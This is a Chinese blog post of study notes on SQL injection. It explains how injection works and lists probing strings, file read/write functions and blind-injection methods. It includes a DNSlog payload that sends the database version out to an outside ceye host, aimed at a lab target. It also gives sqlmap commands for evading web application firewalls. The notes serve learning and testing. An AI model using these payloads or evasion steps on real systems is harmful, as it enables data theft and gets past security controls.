SQL注入

最新推荐文章于 2024-05-20 10:00:15 发布
最新推荐文章于 2024-05-20 10:00:15 发布
阅读量76 收藏
点赞数
分类专栏: 网络安全-渗透篇 文章标签: sql 数据库 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Massimo__JAVA/article/details/130456605
版权

一、介绍

SQL注入漏洞是一种常见的网络攻击方式,攻击者通过构造恶意的SQL语句来执行未经授权的操作,如非法查询、修改或删除数据。

二、原理

系统对用户的输入过滤不严,导致用户可以输入一些恶意的参数,从而被带到数据库中执行

三、MySQL注入

在这里插入图片描述1)、判断注入点
旧方法:
and 1=1 页面正常
and 1=2 页面错误
单双引号
/1 /0

2)、文件读写操作
load_file():读取函数
into outfile或into dumpfile:导出函数

3)、addslashes()
该函数返回在预定义字符之前添加反斜杠的字符串
预定义字符:
单引号
双引号
反斜杠
NULL

4)、类型&&提交注入
在真实SQL注入安全测试中,首先要明确提交数据及提交方法再进行注入

参数类型:
数字、字符、收索、JSON等

请求方法:
GET、POST、COOKIE、REQUEST、HTTP头等

简单的提交测试:
测试代码:

<?php

$get = $_GET['g'];
echo $get;

$post = $_POST['p'];
echo $post;

?>

在这里插入图片描述

<?php
$cookie = $_COOKIE['c'];
echo $cookie;
?>

在这里插入图片描述

<?php
$request = $_REQUEST['r'];
echo $request;
?>

request可以接收post或get提交的参数
在这里插入图片描述

<?php
$s = $_SERVER['HTTP_USER_AGENT'];
echo $s;
?>

在这里插入图片描述
5)、数据库配置文件
连接数据库的文件也就是数据库配置文件,该文件决定网站注入点用户的权限。

6)、access数据库暴力猜解

7)、sqlserver
and exists(select * from sysobjects)-- 返回正常为sqlserver
and exists(select count(*) from sysobjects)-- 有时上面的语句不行就用这条

8)、postgresql
端口:5432
postgresql也有存储数据库所有信息的表 information_schema

9)、MongoDB
端口:27017
常用语言:python
通常sqlmap不支持MongoDB的注入,而nosqlattack支持

10)、查询方式及报错盲注
当进行sql注入时,有很多注入会出现无回显的情况,其中不回显的原因可能时SQL语句查询方式的问题导致,这个时候可以尝试用报错或盲注测试

sql注入报错盲注
盲注就是在注入过程中,获取的数据不能回显至前端页面。此时,需要利用一些方法进行判断或尝试,这个过程称之为盲注。盲注分为以下三类:

基于布尔的SQL盲注——逻辑判断
regexp,like、ascii、left、ord、mid

基于时间的SQL盲注——延时判断
if、sleep

基于报错的SQL盲注——报错回显
floor、updatexml、extractvalue …

11)、regexp
regexp关键字指定正则表达式的字符匹配模式
例:regexp ‘^Massimo[a-z]’ 匹配Massimo及Massimo…等

12)、DNSlog
解决盲注不能回显数据,效率低等问题
payload:
http://192.168.133.133/sqli/Less-2/?id=-1 and if((LOAD_FILE(CONCAT(‘\\’,(select version()),‘.自己的ceye地址\abc’))),1,0)–+
在这里插入图片描述

在这里插入图片描述
13)、二次注入
原理:
1、插入恶意数据
第一次进行数据库插入数据的时候,仅仅对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据包含恶意内容。
2、引用恶意数据
在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次需要进行查询的时候,直接从数据库中取出了恶意数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。

14)、堆叠注入
在mysql中,用分号 ; 表示一条语句的结束,所有我们可以用分号结束上一条语句,再添加其它的sql语句

局限性:只产生在部分数据库

15)、绕WAF
在这里插入图片描述16)、benchmark()函数
测试数据库中特定表达式的执行时间

benchmark(loop_count,expr)
loop_count 循环次数
expr 要循环的表达式

17)、sqlmap绕waf
使用tamper库

python sqlmap.py -u “url” --tamper=rdog.py --proxy=http://127.0.0.1:8080
问题:数据包UA头中带有sqlmap字样

解决:随机头部
python sqlmap.py -u “url” --tamper=rdog.py --proxy=http://127.0.0.1:8080 --random-agent

18)、sqlmap请求过快,被waf拦截
解决1:
自定义UA头
–user-agent=“”

解决2:延时
–delay 1
每隔1秒发一个数据包

解决3:代理池

19)、请求包中accept检测
解决:中转脚本

Massimo_ycw
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入详解
热门推荐
yy
05-05 19万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
sql注入
leekos的博客,分享web安全相关知识~
12-06 1876
sql提交注入
细说——SQL注入
LainWith的博客
10-09 7645
目录SQL是什么?什么是SQL注入漏洞原理漏洞原因为什么会有SQL注入注⼊点可能存在的位置漏洞危害提交方法判断注入点判断字符型还是数字型sql注入绕过获取网站路径SQL 注入读写文件1. 数据库支持文件读写2. 当前用户具有文件权限3. 知道文件绝对路径查询方式及报错盲注⭐查询方式报错盲注报错注入函数二次注入原理实施步骤举例堆叠查询DNSlog脑图常见数据库,及注入相关⭐注释符、数据库端口数据库文件后缀名特有的数据库查看当前用户或权限ASCII转换函数不同数据库注入结果的区别⭐Sql注入中连接字符串常用函数
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、...
sql注入网站源码
04-09
挺好的带有sql注入漏洞的asp网站源码,可以自行搭建环境。
SQL 注入天书.pdf
08-06
SQL 注入学习天书
第85天:代码审计-PHP项目&TP框架&SQL&XSS&架构&路由&调试&写法
weixin_71529930的博客
05-18 538
流程:调试开关-->Show.php-->input写法-->SQL执行监控。注入payload,如果1<2延时两秒,否则正常,看sql语句是否能够注入。开启调试,首先查看主目录下index文件的模板目录是哪个目录。配置完成以后随便打开一个新闻页面,查看流程中的最后一个文件。这里因为是mvc框架开发的,所以要看输出要看view目录下。查看后台输出的地方是否对输出的内容做了一些转义。这里seay监控不到了,自带的插件可以监控到。登录后台,进行留言管理,发现会弹窗。常规架构,mvc架构,第三方架构。
sql去除表中某个字段的空格
最新发布
HelloWorld的专栏
05-20 52
比如表中名字字段,名字之间有空格,需要把空格去除,应该如何写SQL语句实现?函数来去除字符串两端的空格,如果需要去除字段中的所有空格,可以使用。以下是一个示例,假设我们有一个名为。的表,并且我们想要去除。在SQL中,可以使用。
Oracle数据库之PL/SQL基本语法(八)
pursue_mony的博客
05-14 114
PL/SQL 是 Oracle 数据库中使用的过程化 SQL 语言扩展,它允许你在 SQL 语句中嵌入控制结构、变量声明、异常处理等。用于在 PL/SQL 块中输出调试信息。为了看到这些信息,你需要在 SQL*Plus 或其他客户端中启用它(例如,使用。PL/SQL 代码通常被组织在块(block)中。一个块包含三个部分:声明部分、执行部分和异常处理部分。包是 PL/SQL 中一种将逻辑、变量、常量、游标、类型、子程序、异常等组合在一起的数据库对象。在 PL/SQL 中,你可以在。部分来处理运行时错误。
SQL的心得
weixin_64842400的博客
05-11 610
接着,系统按照 GROUP BY 子句中的指定字段分组,并对每个分组进行计算,生成虚拟的分组结果表。执行顺序 :from > on > where > group by > having > select > distinct > order by > top。4、聚合函数本质:对指定的列进行聚合,如果我们用了group by,我们可以对每个分组应用内聚合函数。在分组内部,聚合函数会自动处理所有重复的行。具体来说,在执行 SELECT 子句时,系统先计算 SELECT 中的列表达式和函数等,然后。
sql实践
m0_56366541的博客
05-14 248
3.在select中使用if/case语句(from、where中也可以)在excel导入数据时要先在数据库中创建对应的数据库表。之后点击开始等待一会就结束了。选择文件,选择需要导入的表。2.尝试简单查询/复杂查询。1.从excel导入数据。6.存储过程中的本地变量。
在docker上部署postgresSQL主从
不会编程的猫星人
05-17 519
在docker上部署postgresSQL主从
MySQL基础:SQL分类DDL、DML、DQL、DCL;函数、约束、多表查询、事务、并发事务四大问题、事务隔离级别——脏写、脏读、不可重复读、幻读
qq_44700578的博客
05-16 344
MySQL基础:SQL分类DDL、DML、DQL、DCL;函数、约束、多表查询、事务、并发事务四大问题、事务隔离级别——脏写、脏读、不可重复读、幻读
Oracle 数据库 Sql 优化建议
Ahern_的博客
05-16 869
10、用索引提高效率,通常在大表中使用索引特别有效,虽然使用索引能得到查询效率的提高,但也必须注意到索引的代价,索引是需要牺牲存储空间来存放索引信息的,并且索引需要定期维护,每当有记录在表中增减或索引列被修改时,索引本身也会被修改,这就味着每条INSERT,DELETE,UPDATE将为此多付出4-5次的磁盘I/O。18、在使用索引字段作为条件时,如果该索引是复合索引,那么必须使用到该索引中的第一个字段作为条件时才能保证系统使用该复合索引,否则该索引将不被使用,尽可能的让字段顺序与符合索引顺序一致。
一条查询SQL的执行过程
码星人
05-14 520
主要总结一下Mysql中查询sql的执行逻辑
Postgresql源码(130)ExecInterpExpr转换为IR的流程
InternalsOf
05-17 1289
ExecInterpExpr转换为IR的流程
sql注入sql注入
05-02
SQL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的数据库操作。攻击者可以利用这个漏洞来绕过身份验证、获取敏感数据、修改数据或者执行其他恶意操作。 为了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值